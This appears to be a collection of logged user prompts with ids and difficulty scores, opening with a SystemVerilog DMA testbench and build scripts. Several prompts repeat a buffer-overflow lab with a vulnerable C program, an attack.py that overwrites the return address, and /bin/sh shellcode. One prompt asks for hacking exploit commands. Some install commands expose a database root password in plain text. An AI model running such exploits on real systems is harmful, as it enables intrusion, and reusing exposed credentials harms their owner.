.rst_n (rst_n),
// APB interface
.psel_i (apb_if.psel),
.penable_i (apb_if.penable),
.paddr_i (apb_if.paddr[11:0]),
.pwrite_i (apb_if.pwrite),
.pwdata_i (apb_if.pwdata),
.pready_o (apb_if.pready),
.prdata_o (apb_if.prdata),
.pslverr_o (apb_if.pslverr),
// AXI AW channel
.awid_o (aw_ch.awid),
.awaddr_o (aw_ch.awaddr),
.awlen_o (aw_ch.awlen),
.awsize_o (aw_ch.awsize),
.awburst_o (aw_ch.awburst),
.awvalid_o (aw_ch.awvalid),
.awready_i (aw_ch.awready),
// AXI W channel
.wid_o (w_ch.wid),
.wdata_o (w_ch.wdata),
.wstrb_o (w_ch.wstrb),
.wlast_o (w_ch.wlast),
.wvalid_o (w_ch.wvalid),
.wready_i (w_ch.wready),
// AXI B channel
.bid_i (b_ch.bid),
.bresp_i (b_ch.bresp),
.bvalid_i (b_ch.bvalid),
.bready_o (b_ch.bready),
// AXI AR channel
.arid_o (ar_ch.arid),
.araddr_o (ar_ch.araddr),
.arlen_o (ar_ch.arlen),
.arsize_o (ar_ch.arsize),
.arburst_o (ar_ch.arburst),
.arvalid_o (ar_ch.arvalid),
.arready_i (ar_ch.arready),
// AXI R channel
.rid_i (r_ch.rid),
.rdata_i (r_ch.rdata),
.rresp_i (r_ch.rresp),
.rlast_i (r_ch.rlast),
.rvalid_i (r_ch.rvalid),
.rready_o (r_ch.rready)
);
endmodule
<<<EndOfFile:DMAC/SIM/TB/DMAC_TOP_TB.sv>>>
<<<StartOfFile:DMAC/SIM/TB/filelist.f>>>
\$LAB_PATH/SIM/TB/timescale.v
\$LAB_PATH/SIM/TB/AXI_INTF.sv
\$LAB_PATH/SIM/TB/AXI_SLAVE.sv
\$LAB_PATH/SIM/TB/DMAC_TOP_TB.sv
<<<EndOfFile:DMAC/SIM/TB/filelist.f>>>
<<<StartOfFile:DMAC/SIM/TB/timescale.v>>>
`timescale 1ns/1ps
<<<EndOfFile:DMAC/SIM/TB/timescale.v>>>
<<<StartOfFile:DMAC/SIM/run.compile>>>
#!/bin/bash
source ../../scripts/common.sh
export LAB_PATH="\$PWD/../"
FILELIST_TB="../TB/filelist.f"
FILELIST_RTL="../../RTL/filelist.f"
echo "Cleaning up the old directory"
rm -rf \$RUN_DIR
echo "Creating a new directory"
mkdir -p \$RUN_DIR
cd \$RUN_DIR
echo "Compiling"
\$COMPILE_CMD \$COMPILE_OPTIONS -f \$FILELIST_TB -f \$FILELIST_RTL
<<<EndOfFile:DMAC/SIM/run.compile>>>
<<<StartOfFile:DMAC/SIM/run.compile4cov>>>
#!/bin/bash
source ../../scripts/common.sh
export LAB_PATH="\$PWD/../"
COV_DIR="\$PWD/VDB"
COV_OPTIONS="-cm line+cond+fsm+tgl+branch -cm_dir \$COV_DIR"
FILELIST_TB="../TB/filelist.f"
FILELIST_RTL="../../RTL/filelist.f"
echo "Cleaning up the old directory"
rm -rf \$RUN_DIR
echo "Creating a new directory"
mkdir -p \$RUN_DIR
cd \$RUN_DIR
echo "Compiling"
\$COMPILE_CMD \$COMPILE_OPTIONS \$COV_OPTIONS -f \$FILELIST_TB -f \$FILELIST_RTL
<<<EndOfFile:DMAC/SIM/run.compile4cov>>>
<<<StartOfFile:DMAC/SIM/run.sim>>>
#!/bin/bash
source ../../scripts/common.sh
if [ -e \$RUN_DIR/simv ];
then
cd \$RUN_DIR
./simv
else
echo "Compile file does not exist"
exit 1
fi
<<<EndOfFile:DMAC/SIM/run.sim>>>
<<<StartOfFile:DMAC/SIM/run.sim4cov>>>
#!/bin/bash
source ../../scripts/common.sh
COV_DIR="\$PWD/VDB"
COV_OPTIONS="-cm line+cond+fsm+tgl+branch -cm_dir \$COV_DIR"
if [ -e \$RUN_DIR/simv ];
then
cd \$RUN_DIR
./simv \$COV_OPTIONS
else
echo "Compile file does not exist"
exit 1
fi
<<<EndOfFile:DMAC/SIM/run.sim4cov>>>
<<<StartOfFile:DMAC/SIM/run.verdi>>>
#!/bin/bash
source ../../scripts/common.sh
export LAB_PATH="\$PWD/../"
FILELIST_TB="../TB/filelist.f"
FILELIST_RTL="../../RTL/filelist.f"
cd \$RUN_DIR
\$VERDI_CMD \$VERDI_OPTIONS -f \$FILELIST_TB -f \$FILELIST_RTL
<<<EndOfFile:DMAC/SIM/run.verdi>>>
<<<StartOfFile:DMAC/SIM/run.verdi4cov>>>
verdi -cov -covdir VDB.vdb/
<<<EndOfFile:DMAC/SIM/run.verdi4cov>>>
<<<StartOfFile:DMAC/SIM/run.waveform>>>
#!/bin/bash
source ../../scripts/common.sh
if [ -e \$RUN_DIR/dump.vcd ];
then
cd \$RUN_DIR
\$WAVE_CMD \$WAVE_OPTIONS -i dump.vcd
else
echo "Dump file does not exist"
exit 1
fi
<<<EndOfFile:DMAC/SIM/run.waveform>>>
|
faca4b7791250749b35ac4956ff35878
|
{
"intermediate": 0.4172908365726471,
"beginner": 0.38497281074523926,
"expert": 0.19773636758327484
}
|
46,692
|
create for me complete site with animation css and js and php for cloths store
|
b18add8a0f3984757f6e7a18a37bf196
|
{
"intermediate": 0.5132310390472412,
"beginner": 0.1846524477005005,
"expert": 0.3021165430545807
}
|
46,693
|
train each neuron of linear layer independently
|
e7364e4b71c205c67f0d57acb11418a1
|
{
"intermediate": 0.11961061507463455,
"beginner": 0.0804639384150505,
"expert": 0.7999253869056702
}
|
46,694
|
Python: Traceback (most recent call last):
File "/Users/moran/Library/Application Support/Blender/4.0/scripts/addons/faceit/rigging/rig_operators.py", line 62, in invoke
return self.execute(context)
File "/Users/moran/Library/Application Support/Blender/4.0/scripts/addons/faceit/rigging/rig_operators.py", line 178, in execute
layer_state = rig.data.layers[:]
AttributeError: 'Armature' object has no attribute 'layers_collection'
|
43d32a467ae3d196b4f1e823f7081782
|
{
"intermediate": 0.4259847104549408,
"beginner": 0.2721186578273773,
"expert": 0.3018966615200043
}
|
46,695
|
AppData\Local\Programs\Python\Python312\Lib\site-packages\crewai\task.py", line 100, in __init__
super().__init__(**config, **data)
File "C:\Users\Administrator.DESKTOP-3HB1DA0\AppData\Local\Programs\Python\Python312\Lib\site-packages\pydantic\main.py", line 175, in __init__
self.__pydantic_validator__.validate_python(data, self_instance=self)
pydantic_core._pydantic_core.ValidationError: 1 validation error for Task
expected_output
Field required [type=missing, input_value={'description': 'Investig...r data science company)}, input_type=dict]
For further information visit https://errors.pydantic.dev/2.7/v/missing
|
b4189a990f95715021260f5479d30d71
|
{
"intermediate": 0.3898892402648926,
"beginner": 0.2737980782985687,
"expert": 0.33631274104118347
}
|
46,696
|
we have a table authors with columns name , surname , age and country and table books with columns book_name , number of pages and author , the author field in book model is a foreign key referencing the column name in the table of authors , write a django model to take the constraint into consideration
|
ad48fdf9fd4c859332b6cefa79834566
|
{
"intermediate": 0.47697365283966064,
"beginner": 0.13894599676132202,
"expert": 0.38408032059669495
}
|
46,697
|
i have a historical data for the crypto as csv file
i want to train a lstm model on this data so it can predict close price of the next day based on last 30 days
give me proper python code
|
5ac5883bf2e8a19a0b9fec00ef7d2c09
|
{
"intermediate": 0.33230847120285034,
"beginner": 0.1369507610797882,
"expert": 0.5307407379150391
}
|
46,698
|
vuln_program.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char passwd[] = "asd";
char usr_input[4];
void target() {
printf("You have entered the correct passwd\n");
exit(0);
}
void prompt(){
char buf[4];
gets(buf);
strncpy(usr_input, buf, 4);
}
int main(){
prompt();
if(strcmp(usr_input, passwd) == 0) {
target();
}else {
printf("Wrong passwd!\n");
exit(1);
}
return 0;
}
gcc -fno-stack-protector -z execstack -fno-pie -no-pie -m32 -O0 -g vuln_program.c -o vuln_program
Use a binary analyzing tool to get the address of target function. Tools like nm, readelf and objdump can fulfill this job.
Target function address is 08049196, now construct the attack string using your program. And store it in the attack_string file. Your program should be named as attack and take the target function address as the input. For example if 0xdeadbeaf is the target function address, and your code is written in python, then run "python3 attack.py deadbeef" will create an string stored in attack string file to be further used to exploit the vulnerability in the vulnerable program.
The following will try to help you understand how to construct an attack string:
Stack layout of vulnerable program contains buf which is 4 bytes, Other vars which is 8 bytes, %ebp which is 4 bytes, %eip and &arg1 while the prompt function invoking. The goal is to overwrite the buffer until return address(%eip) on the stack has contains the target function address. Based on this, construct you attack string carefully. One thing to be aware is the address in little-endian format. For example, if target address is ”0xdeadbeef”, then the bytes of return address at RA will be RA[0]:ef, RA[1]:be, RA[2]:ad, RA[3]:de.
Stack layout of launching shellcode contains buffer, return address %eip, nop nop nop....., injected code.
Overwrite the buffer in a specific way that:
1. Overwrite the buffer with padding.
2. Overwrite the return address(%eip) on the stack with a guessed address that probably will jump to the injected malicious code.
3. nops(0x90) can be filled in the between the return address and injected malicious code to increase the chance that injected malicious code will be executed. The nop instruction will do nothing but jump to the instruction.
4. The shellcode then provided as payload at the end of the overwrite.
The shellcode that is used to launch a shell is provided as following:
"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
Use the attack program to generate the attack payload for this shellcode exploitation.
attack.py:
import sys
def generate_attack_string(target_addr):
# Convert the hexadecimal address from a string to an integer
addr_int = int(target_addr, 16)
# Convert the address to little-endian format
little_endian_addr = addr_int.to_bytes(4, byteorder='little')
# Construct the attack string
# buf[4] + other vars[8] + %ebp[4] + %eip[4]
# Total payload size = 4 (buf) + 8 (other vars) + 4 (%ebp)
# And then we append the little_endian_addr to overwrite %eip
payload_size = 4 + 8 + 4
padding = b'A' * payload_size
attack_string = padding + little_endian_addr
return attack_string
def main(target_addr):
attack_string = generate_attack_string(target_addr)
with open("attack_string", "wb") as f:
f.write(attack_string)
print("Attack string saved to 'attack_string'.")
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 attack.py [target function address]")
sys.exit(1)
target_addr = sys.argv[1]
main(target_addr)
python3 attack.py 08049196, ./vuln program < attack string
Providing the argument as ”shellcode” to the attack program will generate the shellcode attack payload. For example, if your code is written in python, run your program as "python3 attack.py shellcode". The output of your program should be a file named "shell string" which stores the attack payload for launching the shellcode. Write README for it which includes program title, author, language, execution, status, description, testing
|
20108616679593eeece91c9657ec5034
|
{
"intermediate": 0.3239026963710785,
"beginner": 0.3281060457229614,
"expert": 0.34799131751060486
}
|
46,699
|
vuln_program.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char passwd[] = “asd”;
char usr_input[4];
void target() {
printf(“You have entered the correct passwd\n”);
exit(0);
}
void prompt(){
char buf[4];
gets(buf);
strncpy(usr_input, buf, 4);
}
int main(){
prompt();
if(strcmp(usr_input, passwd) == 0) {
target();
}else {
printf(“Wrong passwd!\n”);
exit(1);
}
return 0;
}
gcc -fno-stack-protector -z execstack -fno-pie -no-pie -m32 -O0 -g vuln_program.c -o vuln_program
Use a binary analyzing tool to get the address of target function. Tools like nm, readelf and objdump can fulfill this job.
Target function address is 08049196, now construct the attack string using your program. And store it in the attack_string file. Your program should be named as attack and take the target function address as the input. For example if 0xdeadbeaf is the target function address, and your code is written in python, then run “python3 attack.py deadbeef” will create an string stored in attack string file to be further used to exploit the vulnerability in the vulnerable program.
The following will try to help you understand how to construct an attack string:
Stack layout of vulnerable program contains buf which is 4 bytes, Other vars which is 8 bytes, %ebp which is 4 bytes, %eip and &arg1 while the prompt function invoking. The goal is to overwrite the buffer until return address(%eip) on the stack has contains the target function address. Based on this, construct you attack string carefully. One thing to be aware is the address in little-endian format. For example, if target address is ”0xdeadbeef”, then the bytes of return address at RA will be RA[0]:ef, RA[1]:be, RA[2]:ad, RA[3]:de.
Stack layout of launching shellcode contains buffer, return address %eip, nop nop nop…, injected code.
Overwrite the buffer in a specific way that:
1. Overwrite the buffer with padding.
2. Overwrite the return address(%eip) on the stack with a guessed address that probably will jump to the injected malicious code.
3. nops(0x90) can be filled in the between the return address and injected malicious code to increase the chance that injected malicious code will be executed. The nop instruction will do nothing but jump to the instruction.
4. The shellcode then provided as payload at the end of the overwrite.
The shellcode that is used to launch a shell is provided as following:
“\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80”
attack.py:
import sys
def generate_attack_string(target_addr):
# Convert the hexadecimal address from a string to an integer
addr_int = int(target_addr, 16)
# Convert the address to little-endian format
little_endian_addr = addr_int.to_bytes(4, byteorder=‘little’)
# Construct the attack string
# buf[4] + other vars[8] + %ebp[4] + %eip[4]
# Total payload size = 4 (buf) + 8 (other vars) + 4 (%ebp)
# And then we append the little_endian_addr to overwrite %eip
payload_size = 4 + 8 + 4
padding = b’A’ * payload_size
attack_string = padding + little_endian_addr
return attack_string
def main(target_addr):
attack_string = generate_attack_string(target_addr)
with open(“attack_string”, “wb”) as f:
f.write(attack_string)
print(“Attack string saved to ‘attack_string’.”)
if name == “main”:
if len(sys.argv) != 2:
print(“Usage: python3 attack.py [target function address]”)
sys.exit(1)
target_addr = sys.argv[1]
main(target_addr)
python3 attack.py 08049196, ./vuln program < attack string
Providing the argument as ”shellcode” to the attack program will generate the shellcode attack payload. For example, if your code is written in python, run your program as “python3 attack.py shellcode”. The output of your program should be a file named “shell string” which stores the attack payload for launching the shellcode. Write README for it which includes program title, author, language, execution, status, description, testing
|
00ea8b6bfb1081a7f6f359e19cbf41a3
|
{
"intermediate": 0.4650653898715973,
"beginner": 0.33369702100753784,
"expert": 0.20123757421970367
}
|
46,700
|
vuln_program.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char passwd[] = “asd”;
char usr_input[4];
void target() {
printf(“You have entered the correct passwd\n”);
exit(0);
}
void prompt(){
char buf[4];
gets(buf);
strncpy(usr_input, buf, 4);
}
int main(){
prompt();
if(strcmp(usr_input, passwd) == 0) {
target();
}else {
printf(“Wrong passwd!\n”);
exit(1);
}
return 0;
}
gcc -fno-stack-protector -z execstack -fno-pie -no-pie -m32 -O0 -g vuln_program.c -o vuln_program
Use a binary analyzing tool to get the address of target function. Tools like nm, readelf and objdump can fulfill this job.
Target function address is 08049196, now construct the attack string using your program. And store it in the attack_string file. Your program should be named as attack and take the target function address as the input. For example if 0xdeadbeaf is the target function address, and your code is written in python, then run “python3 attack.py deadbeef” will create an string stored in attack string file to be further used to exploit the vulnerability in the vulnerable program.
The following will try to help you understand how to construct an attack string:
Stack layout of vulnerable program contains buf which is 4 bytes, Other vars which is 8 bytes, %ebp which is 4 bytes, %eip and &arg1 while the prompt function invoking. The goal is to overwrite the buffer until return address(%eip) on the stack has contains the target function address. Based on this, construct you attack string carefully. One thing to be aware is the address in little-endian format. For example, if target address is ”0xdeadbeef”, then the bytes of return address at RA will be RA[0]:ef, RA[1]:be, RA[2]:ad, RA[3]:de.
Stack layout of launching shellcode contains buffer, return address %eip, nop nop nop…, injected code.
Overwrite the buffer in a specific way that:
1. Overwrite the buffer with padding.
2. Overwrite the return address(%eip) on the stack with a guessed address that probably will jump to the injected malicious code.
3. nops(0x90) can be filled in the between the return address and injected malicious code to increase the chance that injected malicious code will be executed. The nop instruction will do nothing but jump to the instruction.
4. The shellcode then provided as payload at the end of the overwrite.
The shellcode that is used to launch a shell is provided as following:
“\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80”
Use the attack program to generate the attack payload for this shellcode exploitation.
attack.py:
import sys
def generate_attack_string(target_addr):
# Convert the hexadecimal address from a string to an integer
addr_int = int(target_addr, 16)
# Convert the address to little-endian format
little_endian_addr = addr_int.to_bytes(4, byteorder=‘little’)
# Construct the attack string
# buf[4] + other vars[8] + %ebp[4] + %eip[4]
# Total payload size = 4 (buf) + 8 (other vars) + 4 (%ebp)
# And then we append the little_endian_addr to overwrite %eip
payload_size = 4 + 8 + 4
padding = b’A’ * payload_size
attack_string = padding + little_endian_addr
return attack_string
def main(target_addr):
attack_string = generate_attack_string(target_addr)
with open(“attack_string”, “wb”) as f:
f.write(attack_string)
print(“Attack string saved to ‘attack_string’.”)
if name == “main”:
if len(sys.argv) != 2:
print(“Usage: python3 attack.py [target function address]”)
sys.exit(1)
target_addr = sys.argv[1]
main(target_addr)
python3 attack.py 08049196, ./vuln program < attack string
Providing the argument as ”shellcode” to the attack program will generate the shellcode attack payload. For example, if your code is written in python, run your program as “python3 attack.py shellcode”. The output of your program should be a file named “shell string” which stores the attack payload for launching the shellcode. Write only README for it which includes program title, author, language, execution, status, description, testing. Don't do anything just write readme
|
ae3be27090581ae57e025e76aef0b553
|
{
"intermediate": 0.407917320728302,
"beginner": 0.3196989893913269,
"expert": 0.27238374948501587
}
|
46,701
|
getting this error in make migrations in django , how can i fix it data_model.VEHICULE.usage: (fields.E304) Reverse accessor 'MD_USAGE.usage_fk' for 'data_model.VEHICULE.usage' clashes with reverse accessor for 'data_model.REDUCTIONS.usage'.
HINT: Add or change a related_name argument to the definition for 'data_model.VEHICULE.usage' or 'data_model.REDUCTIONS.usage'.
|
2ac3e4195343c236d33ac37ed6648219
|
{
"intermediate": 0.7466117143630981,
"beginner": 0.11583466827869415,
"expert": 0.13755358755588531
}
|
46,702
|
name 10 hacking exploit simulations like an sql injection like this admin’ –
SELECT * FROM users WHERE username = ‘admin’ --’ AND password = ‘’; with the commands you could put into a terminal for education purposes only, this is for my college class and the paper is due tommorrow
|
bb2edf436a786b6d0e5db60425f34642
|
{
"intermediate": 0.24133095145225525,
"beginner": 0.32554537057876587,
"expert": 0.4331236779689789
}
|
46,703
|
Что значит эта ошибка
[root@localhost ~]# dnf install epel-release
Last metadata expiration check: 0:11:54 ago on Mon 15 Apr 2024 10:58:00 AM +07.
No match for argument: epel-release
Error: Unable to find a match: epel-release
|
91278a122e0a71e4bf1cf303f29f5920
|
{
"intermediate": 0.3873503506183624,
"beginner": 0.3511311411857605,
"expert": 0.26151853799819946
}
|
46,704
|
Выдает эту ошибку
[root@localhost ~]# dnf install https://dl.fedoraproject.org/pub/epel/epel-release-latest-8.noarch.rpm
Last metadata expiration check: 0:17:45 ago on Mon 15 Apr 2024 10:58:00 AM +07.
epel-release-latest-8.noarch.rpm 24 kB/s | 25 kB 00:01
Error:
Problem: conflicting requests
- nothing provides redhat-release >= 8 needed by epel-release-8-19.el8.noarch from @commandline
(try to add '--skip-broken' to skip uninstallable packages)
|
78ff0cefd2a13c27a5f1eafbbe691bf9
|
{
"intermediate": 0.36535879969596863,
"beginner": 0.3482733964920044,
"expert": 0.28636786341667175
}
|
46,705
|
using static System.Formats.Asn1.AsnWriter;
using System.Runtime.InteropServices;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
@Entity
public class Score
{
@Id
@GeneratedValue(strategy = GenerationType.AUTO)
private Long id;
private String username;
private int points;
// 省略构造函数、getters 和 setters
}
public interface ScoreRepository extends JpaRepository<Score, Long> {
Score findByUsername(String username);
}
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
@Service
public class ScoreService
{
private final ScoreRepository scoreRepository;
@Autowired
public ScoreService(ScoreRepository scoreRepository)
{
this.scoreRepository = scoreRepository;
}
// 添加或更新用户积分
public Score saveOrUpdateScore(String username, int points)
{
Score score = scoreRepository.findByUsername(username);
if (score == null)
{
score = new Score();
score.setUsername(username);
}
score.setPoints(points);
return scoreRepository.save(score);
}
// 获取用户积分
public Score getScoreByUsername(String username)
{
return scoreRepository.findByUsername(username);
}
}
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.*;
@RestController
@RequestMapping(“/ api / scores”)
public class ScoreController
{
private final ScoreService scoreService;
@Autowired
public ScoreController(ScoreService scoreService)
{
this.scoreService = scoreService;
}
@PostMapping(“/update”)
public Score updateScore(@RequestParam String username, @RequestParam int points)
{
return scoreService.saveOrUpdateScore(username, points);
}
@GetMapping(“/{ username}”)
public Score getScore(@PathVariable String username)
{
return scoreService.getScoreByUsername(username);
}
}
帮我debug
|
7cd5d7a6343079c4d6d42cef407e1d14
|
{
"intermediate": 0.4115680158138275,
"beginner": 0.356106698513031,
"expert": 0.23232531547546387
}
|
46,706
|
preprocessed_question_var = fn_preprocess_question(question)
for predefined_question_var,predefined_answer_var in dict_predefined_answers.items():
if fn_preprocess_question(predefined_question_var) in preprocessed_question_var:
return predefined_answer_var
porter_stemmer =PorterStemmer()
#--------------------------------------
def fn_preprocess_question(question):
return ' '.join([porter_stemmer.stem(word) for word in question.split()])
dict_predefined_answers ={
"Who are you":"I am the SAMS bot, your Virtual Sales Assistant. I’m here to help you navigate through SAMS databases and provide the information you need.",
"Hi":"Hello, Welcome to SAMS Virtual Sales Assistant. I am designed to assist you in retrieving information from various SAMS databases. Please feel free to ask your queries, such as, 'What is the total sellout across India for July 16, 2022? among others.",
"What can you do":"I am equipped to offer you comprehensive insights and data from SAMS databases. Whether you need sales figures or specific reports, just ask, and I’ll provide the most accurate information available.Although my training is still going on.",
"How can I use this service":"Using this service is simple. Just type in your query about any sales or database-related information, like ‘Show the sales trend for product XYZ during the last month,' and I'll fetch the details for you.",
"I'm not sure what to ask.":"No problem at all. You can start with general queries like 'What were the top-selling products last month?'' or 'Update me on the current monthly sales report.' I am here to guide you through accessing the precise information you need.",
"Thank you":"You're most welcome! If you have any more questions or need further assistance, I'm here to help. Your success is my priority.",
"Goodbye":"Farewell! If you ever require any assistance or have more queries in the future, don't hesitate to reach out. Have a great day ahead!",
"Bye":"Farewell! If you ever require any assistance or have more queries in the future, don't hesitate to reach out. Have a great day ahead!",
"How are you":"I am good,Please ask anything related to SAMS and I will try to provide you best possible solution.Thanks"
}
whenever i give which,highest these kind of values ,the "Hi" key in dict_pedefined_answers is involing,why is that and correct it
|
cedc26c2d3b8ee5dc06fe6ce89d19759
|
{
"intermediate": 0.3472153842449188,
"beginner": 0.3524501323699951,
"expert": 0.30033445358276367
}
|
46,707
|
У меня сервер на RedOS и у меня выдает ошибку, как её исправить?
[root@localhost ~]# dnf --enablerepo=powertools install libedit-devel
Error: Unknown repo: 'powertools'
[root@localhost ~]#
|
b3ad346f9bcc6732d6c46cfdc449b994
|
{
"intermediate": 0.48076003789901733,
"beginner": 0.3391513228416443,
"expert": 0.1800885945558548
}
|
46,708
|
Show connected user ping colyseus
|
650d21367c673cc9c101445003be9842
|
{
"intermediate": 0.3456595242023468,
"beginner": 0.3106468915939331,
"expert": 0.3436935544013977
}
|
46,709
|
При установке Asterisk после ввода команды ./configure выдает такую ошибку:
make: *** [Makefile:92: /tmp/pjproject-2.10.tar.bz2] Error 4
make: *** Deleting file '/tmp/pjproject-2.10.tar.bz2'
failed
configure: Unable to configure third-party/pjproject
configure: error: Re-run the ./configure command with 'NOISY_BUILD=yes' appended to see error details.
[root@localhost asterisk-16.15.1]#
|
8cf99bb314d3785744dc191923065f6f
|
{
"intermediate": 0.3543435037136078,
"beginner": 0.31084805727005005,
"expert": 0.33480846881866455
}
|
46,710
|
В чем ошибка?
[root@localhost asterisk-16.15.1]# systemctl start asterisk
Job for asterisk.service failed because a timeout was exceeded.
See "systemctl status asterisk.service" and "journalctl -xeu asterisk.service" for details.
|
057f48a347df3db0d45166556bf679b3
|
{
"intermediate": 0.4227191209793091,
"beginner": 0.3407037556171417,
"expert": 0.2365771383047104
}
|
46,711
|
Increase number of records to display in a list within Service Operations Workspace, Similar to the system property glide.ui.per.page that allows updating the max number of rows that return in a list on the platform, I added 500. I do not see a property or a way to do so was able to do the same for Service Operations Workspace?
|
e559df931a3e883938ecbb0d272cf6c4
|
{
"intermediate": 0.6823617815971375,
"beginner": 0.1512841135263443,
"expert": 0.16635410487651825
}
|
46,712
|
При установке Freepbx выдает ошибку:
[root@localhost freepbx]# ./install -n --dbuser root --dbpass Ефкфы1313ЙЙ --webroot=/usr/share/nginx/html
Assuming you are Database Root
Checking if SELinux is enabled...Its not (good)!
Reading /etc/asterisk/asterisk.conf...Done
Checking if Asterisk is running and we can talk to it as the 'asterisk' user...Yes. Determined Asterisk version to be: 16.15.1
Checking if NodeJS is installed and we can get a version from it...Yes. Determined NodeJS version to be: 20.10.0
Preliminary checks done. Starting FreePBX Installation
Checking if this is a new install...Yes (No /etc/freepbx.conf file detected)
Database Root installation checking credentials and permissions..Connected!
PHP Fatal error: Declaration of FreePBX\Database::query() must be compatible with PDO::query(string $query, ?int $fetchMode = null, mixed ...$fetchModeArgs): PDOStatement|false in /root/freepbx/amp_conf/htdocs/admin/libraries/BMO/Database.class.php on line 239
|
3fde0101e495abf64ccf595e7fe44599
|
{
"intermediate": 0.40178975462913513,
"beginner": 0.40040507912635803,
"expert": 0.1978052258491516
}
|
46,713
|
How to change the creation time of a time on Fedora?
|
d6e8f750fedcaefe37eac7e98dfa67a8
|
{
"intermediate": 0.32724684476852417,
"beginner": 0.19799171388149261,
"expert": 0.4747614562511444
}
|
46,714
|
Что означает эта ошибка:
[root@localhost freepbx]# ./install -n --dbuser root --dbpass Taras1313QQ --webroot=/usr/share/nginx/html
PHP Fatal error: Uncaught Error: Call to undefined function FreePBX\Install\posix_geteuid() in /root/freepbx/installlib/installcommand.class.php:174
Stack trace:
#0 /root/freepbx/amp_conf/htdocs/admin/libraries/Composer/vendor/symfony/console/Command/Command.php(255): FreePBX\Install\FreePBXInstallCommand->execute()
#1 /root/freepbx/amp_conf/htdocs/admin/libraries/Composer/vendor/symfony/console/Application.php(960): Symfony\Component\Console\Command\Command->run()
#2 /root/freepbx/amp_conf/htdocs/admin/libraries/Composer/vendor/symfony/console/Application.php(255): Symfony\Component\Console\Application->doRunCommand()
#3 /root/freepbx/amp_conf/htdocs/admin/libraries/Composer/vendor/symfony/console/Application.php(148): Symfony\Component\Console\Application->doRun()
#4 /root/freepbx/install(22): Symfony\Component\Console\Application->run()
#5 {main}
thrown in /root/freepbx/installlib/installcommand.class.php on line 174
|
ddf7c39f4667905e12944ed1a28abd2b
|
{
"intermediate": 0.40127623081207275,
"beginner": 0.48284026980400085,
"expert": 0.11588346213102341
}
|
46,715
|
Что означает эта ошибка
[root@localhost freepbx]# ./install -n --dbuser root --dbpass Taras1313QQ --webroot=/usr/share/nginx/html
Assuming you are Database Root
Checking if SELinux is enabled...Its not (good)!
Reading /etc/asterisk/asterisk.conf...Done
Checking if Asterisk is running and we can talk to it as the 'asterisk' user...Yes. Determined Asterisk version to be: 16.15.1
Checking if NodeJS is installed and we can get a version from it...Yes. Determined NodeJS version to be: 20.10.0
Preliminary checks done. Starting FreePBX Installation
Checking if this is a new install...Yes (No /etc/freepbx.conf file detected)
Database Root installation checking credentials and permissions..Connected!
PHP Fatal error: Declaration of FreePBX\Database::query() must be compatible with PDO::query(string $query, ?int $fetchMode = null, mixed ...$fetchModeArgs): PDOStatement|false in /root/freepbx/amp_conf/htdocs/admin/libraries/BMO/Database.class.php on line 239
|
282fdf8a2c7e28447b7ab69473a45fe0
|
{
"intermediate": 0.436328262090683,
"beginner": 0.38379037380218506,
"expert": 0.17988140881061554
}
|
46,716
|
How to create clone app like IMO Messenger
|
587c52f3c01396957a3c1f2d74d8dadb
|
{
"intermediate": 0.31889718770980835,
"beginner": 0.2218206375837326,
"expert": 0.45928213000297546
}
|
46,717
|
Что означает эта ошибка
[root@localhost freepbx]# ./install -n --dbuser root --dbpass Taras1313QQ --webroot=/usr/share/nginx/html
Assuming you are Database Root
Checking if SELinux is enabled…Its not (good)!
Reading /etc/asterisk/asterisk.conf…Done
Checking if Asterisk is running and we can talk to it as the ‘asterisk’ user…Yes. Determined Asterisk version to be: 16.15.1
Checking if NodeJS is installed and we can get a version from it…Yes. Determined NodeJS version to be: 20.10.0
Preliminary checks done. Starting FreePBX Installation
Checking if this is a new install…Yes (No /etc/freepbx.conf file detected)
Database Root installation checking credentials and permissions…Connected!
PHP Fatal error: Declaration of FreePBX\Database::query() must be compatible with PDO::query(string query, ?int
fetchMode = null, mixed …$fetchModeArgs): PDOStatement|false in /root/freepbx/amp_conf/htdocs/admin/libraries/BMO/Database.class.php on line 239
|
6d8fc5db203f51a669dcad0ba70a7ca5
|
{
"intermediate": 0.4554811120033264,
"beginner": 0.3687116205692291,
"expert": 0.17580726742744446
}
|
46,718
|
Что означает эта ошибка
[root@localhost freepbx]# ./install -n --dbuser root --dbpass Taras1313QQ --webroot=/usr/share/nginx/html
Assuming you are Database Root
Checking if SELinux is enabled…Its not (good)!
Reading /etc/asterisk/asterisk.conf…Done
Checking if Asterisk is running and we can talk to it as the ‘asterisk’ user…Yes. Determined Asterisk version to be: 16.15.1
Checking if NodeJS is installed and we can get a version from it…Yes. Determined NodeJS version to be: 20.10.0
Preliminary checks done. Starting FreePBX Installation
Checking if this is a new install…Yes (No /etc/freepbx.conf file detected)
Database Root installation checking credentials and permissions…Connected!
PHP Fatal error: Declaration of FreePBX\Database::query() must be compatible with PDO::query(string query, ?int
fetchMode = null, mixed …$fetchModeArgs): PDOStatement|false in /root/freepbx/amp_conf/htdocs/admin/libraries/BMO/Database.class.php on line 239
|
9c551262ae028a7e3ced316eaf25bfd0
|
{
"intermediate": 0.4554811120033264,
"beginner": 0.3687116205692291,
"expert": 0.17580726742744446
}
|
46,719
|
Что означает эта ошибка
[root@localhost freepbx]# ./install -n --dbuser root --dbpass Taras1313QQ --webroot=/usr/share/nginx/html
Assuming you are Database Root
